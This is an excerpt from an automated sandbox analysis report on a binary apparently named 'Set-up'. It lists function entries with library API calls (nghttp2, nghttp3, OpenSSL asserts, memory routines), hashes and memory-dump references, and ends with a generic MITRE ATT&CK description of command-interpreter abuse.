Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(frame->hd.type == NGHTTP2_HEADERS,nghttp2_session.c,00001ED2), ref: 002627F1

Strings

nghttp2_session.c, xrefs: 002627E7
frame->hd.type == NGHTTP2_HEADERS, xrefs: 002627EC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: frame->hd.type == NGHTTP2_HEADERS$nghttp2_session.c
API String ID: 1222420520-2237711319
Opcode ID: 31b12a589a6981da833e1de9a9a89b18b1f9b5d2c2e17dbc473dfe95cfaf9b68
Instruction ID: 5c1eaa47c7357776e43cfbb71bc6793416ead7c7666b0db1819cd706e77f87b0
Opcode Fuzzy Hash: 31b12a589a6981da833e1de9a9a89b18b1f9b5d2c2e17dbc473dfe95cfaf9b68
Instruction Fuzzy Hash: 3D314871A20A42DAEB258E249C51F79B390AF91319F18497EE905871D3D321D8EAC7A1

Function 00274400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 002744B7

Strings

nghttp3_conn.c, xrefs: 002744AD
tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 002744B2

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: a9981473abe4c26155e2fe2bf5eb25b03f35ebfbbf2a24eed9dacad40de60988
Instruction ID: 44cb2ad4554744e807d32b31efc7f73ceac01c3f42a532348393ede8c8507fe0
Opcode Fuzzy Hash: a9981473abe4c26155e2fe2bf5eb25b03f35ebfbbf2a24eed9dacad40de60988
Instruction Fuzzy Hash: 5621F5722207126FEB106F65DC05F5777EDEF85315F048424F91CC6262E735D424A751

Function 0054A0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0054A161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0054A2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0054A3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0054A499

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 251d6ce1f1516b494d2c258859c39233606b93af7a994317f8e68662db6c3ffb
Instruction ID: 74617e2f0e9c5914fb8f4f5d8779ac89fabfd2b75f5ea26c437b7b3108625277
Opcode Fuzzy Hash: 251d6ce1f1516b494d2c258859c39233606b93af7a994317f8e68662db6c3ffb
Instruction Fuzzy Hash: 36C19C716043109FCB44CF28C888AAA7BE5BF88318F59496DF9498B396D771EC44CB86

Function 00276140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0024D7A7,?,?,0024D7A7), ref: 002761CF

Strings

nghttp3_stream.c, xrefs: 002761C5
i < len || offset == 0, xrefs: 002761CA

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: 580e68b8546543b36c9c79d17fec19893b8a5ab2b2e6998afaeae3853cb1be84
Instruction ID: 4a4e85910e5fbf744cd5276a68680fb6bdc66263e51ec02f884c287f5a07f369
Opcode Fuzzy Hash: 580e68b8546543b36c9c79d17fec19893b8a5ab2b2e6998afaeae3853cb1be84
Instruction Fuzzy Hash: 96119D756143048FD304EF29D88CFAA77E4FB88320F0A44BDE94C473A2DA306959CB92

Function 00278700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,002788D3,00000010,?,?,00000000,00279AE3,0027ACDD,-00000010,?,?,?,00000000,?), ref: 0027873C

Strings

(blklen & 0xfu) == 0, xrefs: 00278737
nghttp3_balloc.c, xrefs: 00278732

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: 06130fcb7d9396b66c9af0154517783b52442a32f65ceb94fd05b2776d493519
Instruction ID: e9412a522dadd0783d6dab532f3230bb45033d21d5a80eca42798a050d606dd2
Opcode Fuzzy Hash: 06130fcb7d9396b66c9af0154517783b52442a32f65ceb94fd05b2776d493519
Instruction Fuzzy Hash: 1711A179A993429FC3229F14DC49B57BBA0AF42704F19C499E858EB293D6349814C751

Function 00298580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,0028F9F0,?,?,?,00000000), ref: 0029858F
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002985A4

Strings

`\h, xrefs: 002985B5

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: CloseHandleObjectSingleWait
String ID: `\h
API String ID: 528846559-3807504640
Opcode ID: f45999117068543cd60e02dc028a0b7bfb57c98dc7e7537f50daa026ce64a879
Instruction ID: 63e4d029f3ed5a4af4e5f573b8beef0cb6a522620caaaaf8b3a3d515765797a2
Opcode Fuzzy Hash: f45999117068543cd60e02dc028a0b7bfb57c98dc7e7537f50daa026ce64a879
Instruction Fuzzy Hash: 03F0A7B66242129BEB008F98D884E1677B4EF8A721B5B0134FA11D7364CB31DC24AF91

Function 001FC1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 001FC1E5
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001FC1F4

Strings

\/@, xrefs: 001FC1DF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlenstrpbrk
String ID: \/@
API String ID: 3089284949-4263999291
Opcode ID: 5f978736e5c5d5388821f3ef1b24c7edf0ce217bfea3e25855a7681a364034d8
Instruction ID: 35dbf0e576030ab9c135b65267abcd5418fd482199751bb4004924590d17512b
Opcode Fuzzy Hash: 5f978736e5c5d5388821f3ef1b24c7edf0ce217bfea3e25855a7681a364034d8
Instruction Fuzzy Hash: 99E086D3E4411916D72120BCBC06BBE5655D6C1A72F1D0267EA68E2244F634884552D2

Function 0026A5A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp2_rcbuf.c,00000058,00265E1F,?), ref: 0026A5D6

Strings

rcbuf->ref > 0, xrefs: 0026A5D1
nghttp2_rcbuf.c, xrefs: 0026A5CC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp2_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-4045439697
Opcode ID: 086aaca029add856ba81e50a0279773de2914b064cf4cb9b864ab3c5934d6258
Instruction ID: 75b18a837303858ee1fcc10248d9966151fac2d93b48b535774dd8b1a09714f5
Opcode Fuzzy Hash: 086aaca029add856ba81e50a0279773de2914b064cf4cb9b864ab3c5934d6258
Instruction Fuzzy Hash: 32F0A0746106019FCA08CF04C865D35B762FF847167C4C288F91A972E2C731CC52DE02

Function 00270300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,00280B2D,5308C483,00000000,00274D9F,?,00270EC8), ref: 00270333

Strings

rcbuf->ref > 0, xrefs: 0027032E
nghttp3_rcbuf.c, xrefs: 00270329

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: 060eeea6181e44b3a8cbd721fc2c8b9e740d58283b75958a47f56186c9155049
Instruction ID: ac9c921ccf0624ae754120f8efe6dd07100d5c0d15313590a92d8f4d724c2e2d
Opcode Fuzzy Hash: 060eeea6181e44b3a8cbd721fc2c8b9e740d58283b75958a47f56186c9155049
Instruction Fuzzy Hash: ACE01C38620A01DFDA148F04D985A25B3A1FB49716F98C198F81C8A2E2D731DC19DA00

Function 003AA170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 003A9F60: GetStdHandle.KERNEL32(000000F4), ref: 003A9F76
Part of subcall function 003A9F60: GetFileType.KERNEL32(00000000), ref: 003A9F83
Part of subcall function 003A9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 003A9FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,003AD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,003ADF70,?,?,?,?,?,?,?,00000000), ref: 003AA18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,003AD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,003ADF70,?,?,?,?,?,?,?), ref: 003AA195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 003AA17C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: ab4477464eb5e82e0227dcec5108119d5999c5598bed2a395425fac91f3f7536
Instruction ID: 0119adea446d77c2a9649b0fcc2956a948844bc20bfe7dd91adba8e16350f99f
Opcode Fuzzy Hash: ab4477464eb5e82e0227dcec5108119d5999c5598bed2a395425fac91f3f7536
Instruction Fuzzy Hash: 36C02272840342ABEB02BEC00C03B3EB9B0BFA2700F081C09B625300D2DA638128A203

Function 00554230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001DF9BB,00000000,001E5F07,?,?,001DF9BB,?), ref: 00554266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001DF9BB,00000000,001E5F07,?,?,001DF9BB,?), ref: 0055427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001DF9BB,00000000,001E5F07,?,?,001DF9BB,?), ref: 00554285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001DF9BB,00000000,001E5F07,?,?,001DF9BB,?), ref: 00554290

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ed04cdb72512b7cd3db0861d56652fb0fff0be92ece59cb87cd65f62f35ffe98
Instruction ID: 7e0eea0b521b34ca2a7f519e79a71fe6c1d24175ab59630966107cf745e76db1
Opcode Fuzzy Hash: ed04cdb72512b7cd3db0861d56652fb0fff0be92ece59cb87cd65f62f35ffe98
Instruction Fuzzy Hash: D701DBB6A011114FE7109F58E455D17BFE4BFD0325F09843AEC459B152DA30EC888F41

Function 00542810 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0052D8A5,?), ref: 0054281B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00542826
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00542831
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0054283A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d97da9145dedc011762544223b449d45af80ae71b9754530196e7dae87d839ea
Instruction ID: 64f0661cb6aae05b32d42c74dd8dd30f8542b853b555f8bfcf5f948e9f6ab1d9
Opcode Fuzzy Hash: d97da9145dedc011762544223b449d45af80ae71b9754530196e7dae87d839ea
Instruction Fuzzy Hash: 76D012F6C0652157F5123A10BC1645B7AF07EE0339F480435FC4531166FE12AD2955C3

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
